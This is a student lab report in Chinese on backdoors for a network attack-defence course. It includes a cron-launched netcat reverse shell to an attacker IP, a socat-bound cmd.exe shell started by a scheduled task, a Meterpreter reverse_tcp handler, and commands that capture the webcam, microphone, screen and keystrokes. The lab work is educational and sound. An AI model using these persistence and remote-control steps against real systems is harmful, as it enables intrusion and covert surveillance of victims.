20165309 《網絡對抗技術》實驗二：後門原理與實踐

20165309 《網絡對抗技術》實驗二：後門原理與實踐

---

• 1.基礎問題回答
  • (1)例舉你能想到的一個後門進入到你係統中的可能方式？
  • (2)例舉你知道的後門如何啓動起來(win及linux)的方式？
  • (3)Meterpreter有哪些給你映像深入的功能？
  • (4)如何發現本身有系統有沒有被安裝後門？
• 2.實驗總結與體會
  • (1)遇到的問題與解決
  • (2)實驗感覺
• 3.實踐過程記錄
  • (0)準備工做
  • (1)使用netcat獲取主機操做Shell，cron啓動
  • (2)使用socat獲取主機操做Shell, 任務計劃啓動
  • (3)使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell
  • (4)使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

---

1.基礎問題回答

(1)例舉你能想到的一個後門進入到你係統中的可能方式？

• 在非官網上下載破解版軟件或打開不請自來的郵件的時候，後門悄然而至，易使工做站和桌面系統被蓄意利用。

(2)例舉你知道的後門如何啓動起來(win及linux)的方式？

• win：點擊釣魚連接；修改註冊表，增長後門自啓動代碼。
• linux：實驗中的cron啓動。

(3)Meterpreter有哪些給你映像深入的功能？

• 拍照、錄像、錄音、獲取擊鍵記錄、截屏......就是這些讓人失去隱私的功能

(4)如何發現本身系統有沒有被安裝後門？

• 使用查殺軟件；
• 留意不明端口和未知進程。

返回目錄

---

2.實驗總結與體會

(1)遇到的問題與解決

• 問題一：運行可執行文件時在已關防火牆的狀態下被Windows當成木馬攔截：拒絕訪問。
  

• 解決一：除了控制面板裏關掉防火牆，win10裏內置的Windows Defender也要關閉，當時沒有發現還有這個...若是依然拒絕訪問的話，能夠添加排除項...在屢次嘗試失敗後，還能夠右鍵可執行文件->屬性->安全->編輯權限。從新生成和傳送後就能夠運行了~
  
  
  

• 問題二：報錯Cannot allocate memory。
  

• 解決二：這個報錯的直譯是：沒法分配內存。我想到了是由於內存不足，因此設置虛擬機的內存爲4G（要分配的比原先大），解決問題。

(2)實驗感覺

跟着老師的實驗指導和學姐學長們的經驗博客，完成本次實驗其實很容易。此次實驗幫助我掌握了後門的原理，也讓我在一次次利用後門的攻擊中有了更直觀的感覺（可能還有一絲絲成功攻擊了本身主機的興奮...？？）。從此必定要加強安全防範意識，按期查殺，以避免本身的隱私和電腦控制權落入他人之手。

返回目錄

---

3.實踐過程記錄

(0)準備工做

• 查看本機IP地址（我在實驗過程當中連了3處地方的Wifi，因此換了3組IP，給本身增長了麻煩...勸告你們要使用固定的網絡）：
  • Windows下：ipconfig
  • Linux下：ifconfig -a（顯示所有接口信息）
• 經常使用後門工具——NC
  • 基本步驟是：打開監聽->反彈鏈接->獲取shell（具體指令可見下方截屏）
    • Win得到Linux Shell
      
    • Linux得到Win Shell
      
    • nc傳輸數據
      

(1)使用netcat獲取主機操做Shell，cron啓動

注：此時Win是攻擊方，Linux是受害方

• 在Win裏用ncat.exe -l -p 5309監聽5309端口

• 在Linux環境下，用crontab -e指令編輯定時任務，選擇基本的vim編輯器（"3"）
  

• vim編輯器中，在最後一行插入08 * * * * /bin/netcat 10.43.34.219 5309 -e /bin/sh（這裏的IP地址爲Win攻擊機的IP）並 :wq!保存退出。
• 上述指令表示在每一個小時的第8分鐘反向鏈接Win主機的5309端口。設置規則咱們能夠學習：Linux定時任務Crontab命令詳解。
  

• 在8分以前，Win裏輸入指令，屏幕上沒有反應，當8分時，Win就得到了Linux的shell，指令的內容則顯示了出來：
  

(2)使用socat獲取主機操做Shell, 任務計劃啓動

注：此時Win是受害方，Linux是攻擊方

• 在Win的計算機管理中建立任務並新建觸發器，在操做的程序或腳本中添加上socat.exe的路徑，在參數欄中填寫tcp-listen:5309 exec:cmd.exe,pty,stderr，把cmd.exe綁定到端口5309，同時將stderr重定向到stdout上：
  
• 按快捷鍵win+L鎖定計算機，建立的任務就開始運行了。
  
• 此時在Linux中輸入指令socat - tcp:172.30.1.13:5309 ，發現成功得到了Win的cmd shell：
  

(3)使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

注：此時Win是受害方，Linux是攻擊方

• Linux中生成後門程序（命令見下圖）
• 使用ncat傳輸已生成的後門程序文件：
  • Win中監聽並保存後門程序
  • Linux再向Win傳輸後門程序
    
    

• Linux裏打開一個終端，使用msfconsole指令進入msf控制檯。
• 接着輸入use exploit/multi/handler使用監聽模塊，設置payload。
  
• 用set payload windows/meterpreter/reverse_tcp使用和生成後門程序時相同的payload，而後設置IP和端口號：
  
• Linux執行監聽，Win運行後門，因而Linux得到了Win主機的鏈接，而且獲得了遠程控制的shell：
  
  

(4)使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

注：需重複上一環節操做至exploit，此時Win是受害方，Linux是攻擊方

• 使用webcam_snap獲取目標主機攝像頭：
  
• 使用screenshot獲取目標主機的截屏：
  
• 使用record_mic指令能夠截獲一段音頻
  
• 使用getuid查看當前目標主機用戶：
  
• 使用keyscan_start記錄擊鍵的過程，使用keyscan_dump讀取擊鍵記錄：
  

返回目錄